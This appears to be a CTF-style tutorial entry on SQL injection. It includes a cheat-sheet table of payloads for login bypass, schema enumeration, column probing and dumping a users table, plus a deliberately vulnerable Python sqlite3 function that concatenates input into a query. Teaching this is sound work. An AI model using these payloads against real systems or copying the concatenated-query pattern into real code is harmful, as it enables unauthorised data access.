SQL Injection
SQL Injection (SQLi) occurs when user input is improperly concatenated into a SQL query, allowing direct control over its execution. In CTFs, this often exposes login bypasses or flag tables within databases.
| Task | Example |
|---|---|
| Test for boolean login bypass | ' OR 1=1 -- |
| Enumerate databases | ' UNION SELECT schema_name FROM information_schema.schemata -- |
| Identify columns via error-based strategy | ' ORDER BY 5 -- |
| Dump table contents | ' UNION SELECT column1, column2 FROM users -- |
import sqlite3
def get_user(username):
conn = sqlite3.connect('users.db')
cursor = conn.cursor()
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchall()
Inject input:
' OR 1=1 --
Resulting query:
SELECT * FROM users WHERE username = '' OR 1=1 --'
This returns all rows, granting unintended access.